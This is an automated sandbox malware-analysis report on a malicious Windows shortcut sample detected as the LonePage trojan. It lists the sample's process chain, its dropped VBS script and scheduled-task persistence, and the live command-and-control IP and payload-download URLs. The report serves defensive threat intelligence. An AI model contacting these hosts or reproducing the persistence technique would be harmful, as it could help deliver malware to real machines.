              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4796, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5244, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Recorded.vbs, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4796, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5244, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\Public\Libraries\Recorded.vbs, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		Valid Accounts2
              Command and Scripting Interpreter              		1
              Scheduled Task/Job              		11
              Process Injection              		11
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		111
              Scripting              		1
              Scheduled Task/Job              		31
              Virtualization/Sandbox Evasion              		LSASS Memory11
              Process Discovery              		Remote Desktop ProtocolData from Removable Media11
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts4
              PowerShell              		Login HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials22
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522697 Sample: 140AEcuVy7.lnk Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 44 x1.i.lencr.org 2->44 46 bg.microsoft.map.fastly.net 2->46 52 Malicious sample detected (through community Yara rule) 2->52 54 Windows shortcut file (LNK) starts blacklisted processes 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 17 other signatures 2->58 9 wscript.exe 1 2->9         started        12 wscript.exe 2->12         started        14 powershell.exe 3 17 2->14         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 60 Windows shortcut file (LNK) starts blacklisted processes 9->60 62 Suspicious powershell command line found 9->62 64 Wscript starts Powershell (via cmd or directly) 9->64 70 3 other signatures 9->70 20 powershell.exe 14 16 9->20         started        23 powershell.exe 12->23         started        40 C:\Users\Public\Libraries\Recorded.vbs, ASCII 14->40 dropped 66 Uses schtasks.exe or at.exe to add and modify task schedules 14->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 14->68 25 Acrobat.exe 18 68 14->25         started        27 conhost.exe 1 14->27         started        29 schtasks.exe 1 14->29         started        42 127.0.0.1 unknown unknown 17->42 file6 signatures7 process8 dnsIp9 48 2.59.222.98, 43820, 58056, 58057 ONEHOSTPLANETUA Ukraine 20->48 31 conhost.exe 20->31         started        33 conhost.exe 23->33         started        35 AcroCEF.exe 107 25->35         started        process10 process11 37 AcroCEF.exe 2 35->37         started        dnsIp12 50 23.41.168.139, 443, 49716 ZAYO-6461US United States 37->50

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              140AEcuVy7.lnk53%ReversingLabsWin32.Trojan.LnkDrop

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://x1.i.lencr.org/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalse
                		unknown
                x1.i.lencr.org
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txttrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://2.59.222.98:43820/KfngnHbxpowershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://2.59.222.98:28402/page107powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.drtrue
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://go.micropowershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.ver)svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                                		unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://2.59.222.98:43820(powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://g.live.com/odclientsettings/Prod/C:edb.log.9.dr, qmgr.db.9.drfalse
                                      		unknown
                                      http://2.59.222.98:28402/page107Bytestf8.GetBytesesXpowershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://2.59.222.98:28402/page107Xpowershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.m1powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://2.59.222.98:43820/KfngnHbpowershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txtpowershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://oneget.orgXpowershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://2.59.222.98:43820powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://oneget.orgpowershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  23.41.168.139
                                                  		unknownUnited States
                                                  		6461ZAYO-6461USfalse
                                                  2.59.222.98
                                                  		unknownUkraine
                                                  		209155ONEHOSTPLANETUAtrue

                                                  Private

                                                  IP
                                                  127.0.0.1

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1522697
                                                  Start date and time:2024-09-30 15:40:20 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 36s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:18
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:140AEcuVy7.lnk
                                                  renamed because original name is a hash value
                                                  Original Sample Name:0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51.lnk
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winLNK@28/51@1/3
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 5
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .lnk
                                                  • Override analysis time to 240s for sample based on specific behavior

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 184.28.88.176, 18.207.85.246, 107.22.247.231, 34.193.227.236, 54.144.73.197, 172.64.41.3, 162.159.61.3, 184.28.90.27, 2.23.197.184, 199.232.214.172, 2.19.126.149, 2.19.126.143, 23.200.0.33
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                  • Execution Graph export aborted for target powershell.exe, PID 6496 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: 140AEcuVy7.lnk

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  09:41:11API Interceptor256x Sleep call for process: powershell.exe modified
                                                  09:41:16API Interceptor3x Sleep call for process: svchost.exe modified
                                                  09:41:26API Interceptor3x Sleep call for process: AcroCEF.exe modified
                                                  15:41:13Task SchedulerRun new task: OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 path: C:\Users\Public\Libraries\Recorded.vbs

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  23.41.168.139XnQmVRj5g0.lnkGet hashmaliciousLonePageBrowse
                                                    Advisory23-UCDMS04-11-01.pdf.lnkGet hashmaliciousUnknownBrowse
                                                      Callus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                                                        Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                          https://seedsmarket.org/Get hashmaliciousHTMLPhisherBrowse
                                                            1445321243TK.pdfGet hashmaliciousUnknownBrowse
                                                              cho6043ijz.000Get hashmaliciousUnknownBrowse
                                                                request_731.pdfGet hashmaliciousUnknownBrowse
                                                                  5ec990.msiGet hashmaliciousUnknownBrowse
                                                                    https://protect.checkpoint.com/v2/r02/___https:/clicktime.symantec.com/a/1/zPM8RRCBucIOtZGS7nBuCsGPfGeuu7uqRi7wib3E_aY=?d=NFaqzsVnaPxuUzxsp1S8ZNeTdv5RUAvfUpeVYxZKOFi_FaxMV9Y7SVV54XPcAAn6YB9QzZxIDYthMOs47JRBZ_0PV-GDVB9ATG93QO70LP8jR59aDk47QZTQk1MCrc9z0M3DqIE9FBr3JkLMrCK4n5QQgA808-LoV3aL3E5VEqB9qmOwHolNy2exhhpbmurcCABi5zh5uKgLe9rfjkQctCPzCg3AE4fvCR7U11tWATVxiJtbisJBMe_5iBhkTFjew3iq_3GEy8ZmD-34Perc98nMVcfrpi4VxTn2R85qX2fmxz3xMqJlfOHtVdD4mDJYHRlv2yYwpVXDDq31APFUszUTvBvOIHR3Pykkf75nE0oRo-IGsNY6JAjIXdEf9hc703INnKhyaOlaJqzSGk7sTDVPbYStXF2M5bSFRVWbiTwfxF2vjGvw-UOxN6lhQJBYgMpfIk92Omh-tbjm4_bTau0WyFvFbUBrukuGpdg%3D&u=http%3A%2F%2Fwww.globalindustrial.com%2F___.YzJlOmdlcmZsb3JzcGE6YzpvOjVjNDhlMDRlZTQ0YTE0ZTU3OTkxM2M3YTlmYTI1YmE4Ojc6NTQxYTpmMjVhNGFkOWJmNTc4NzRiYWUxZDE4NmIxZWVmYzYzZTI1YWI1YWJhOTNjY2IyMjY3ZjEyMTdhNjg1MjRmZGFkOmg6RjpOGet hashmaliciousUnknownBrowse
                                                                      2.59.222.98MSkUffzfPy.htaGet hashmaliciousLonePageBrowse
                                                                      • 2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      bg.microsoft.map.fastly.netPurchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                                                      • 199.232.214.172
                                                                      SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 199.232.214.172
                                                                      https://cganet.com/Get hashmaliciousUnknownBrowse
                                                                      • 199.232.214.172
                                                                      UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 199.232.214.172
                                                                      7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 199.232.214.172
                                                                      UhkzPftQIt.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 199.232.214.172
                                                                      7LC2izrr9u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      • 199.232.214.172
                                                                      https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                      • 199.232.214.172
                                                                      INVOICE DUE..xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 199.232.214.172

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ONEHOSTPLANETUAMSkUffzfPy.htaGet hashmaliciousLonePageBrowse
                                                                      • 2.59.222.98
                                                                      https://transex.us/Get hashmaliciousUnknownBrowse
                                                                      • 2.59.222.121
                                                                      https://transex.usGet hashmaliciousUnknownBrowse
                                                                      • 2.59.222.121
                                                                      https://www.coimmune.com/Get hashmaliciousUnknownBrowse
                                                                      • 2.59.222.122
                                                                      https://www.centralyou.agency/Get hashmaliciousUnknownBrowse
                                                                      • 2.59.222.122
                                                                      http://jointcharging.comGet hashmaliciousUnknownBrowse
                                                                      • 2.59.222.122
                                                                      https://jointcharging.comGet hashmaliciousUnknownBrowse
                                                                      • 2.59.222.122
                                                                      https://fdhaero.comGet hashmaliciousGRQ ScamBrowse
                                                                      • 2.59.222.122
                                                                      https://fdhaero.comGet hashmaliciousGRQ ScamBrowse
                                                                      • 2.59.222.122
                                                                      http://www.starconstructioninc.org/Get hashmaliciousUnknownBrowse
                                                                      • 2.59.222.119
                                                                      ZAYO-6461USXnQmVRj5g0.lnkGet hashmaliciousLonePageBrowse
                                                                      • 23.41.168.139
                                                                      Advisory23-UCDMS04-11-01.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139
                                                                      Callus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                                                                      • 23.41.168.139
                                                                      Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139
                                                                      https://seedsmarket.org/Get hashmaliciousHTMLPhisherBrowse
                                                                      • 23.41.168.139
                                                                      1445321243TK.pdfGet hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139
                                                                      cho6043ijz.000Get hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139
                                                                      request_731.pdfGet hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139
                                                                      5ec990.msiGet hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139
                                                                      https://protect.checkpoint.com/v2/r02/___https:/clicktime.symantec.com/a/1/zPM8RRCBucIOtZGS7nBuCsGPfGeuu7uqRi7wib3E_aY=?d=NFaqzsVnaPxuUzxsp1S8ZNeTdv5RUAvfUpeVYxZKOFi_FaxMV9Y7SVV54XPcAAn6YB9QzZxIDYthMOs47JRBZ_0PV-GDVB9ATG93QO70LP8jR59aDk47QZTQk1MCrc9z0M3DqIE9FBr3JkLMrCK4n5QQgA808-LoV3aL3E5VEqB9qmOwHolNy2exhhpbmurcCABi5zh5uKgLe9rfjkQctCPzCg3AE4fvCR7U11tWATVxiJtbisJBMe_5iBhkTFjew3iq_3GEy8ZmD-34Perc98nMVcfrpi4VxTn2R85qX2fmxz3xMqJlfOHtVdD4mDJYHRlv2yYwpVXDDq31APFUszUTvBvOIHR3Pykkf75nE0oRo-IGsNY6JAjIXdEf9hc703INnKhyaOlaJqzSGk7sTDVPbYStXF2M5bSFRVWbiTwfxF2vjGvw-UOxN6lhQJBYgMpfIk92Omh-tbjm4_bTau0WyFvFbUBrukuGpdg%3D&u=http%3A%2F%2Fwww.globalindustrial.com%2F___.YzJlOmdlcmZsb3JzcGE6YzpvOjVjNDhlMDRlZTQ0YTE0ZTU3OTkxM2M3YTlmYTI1YmE4Ojc6NTQxYTpmMjVhNGFkOWJmNTc4NzRiYWUxZDE4NmIxZWVmYzYzZTI1YWI1YWJhOTNjY2IyMjY3ZjEyMTdhNjg1MjRmZGFkOmg6RjpOGet hashmaliciousUnknownBrowse
                                                                      • 23.41.168.139

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8192
                                                                      Entropy (8bit):0.3588072191296206
                                                                      Encrypted:false
                                                                      SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                      MD5:663C5D6018506231E334FB3EA962ED1C
                                                                      SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                      SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                      SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                      Malicious:false
                                                                      Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
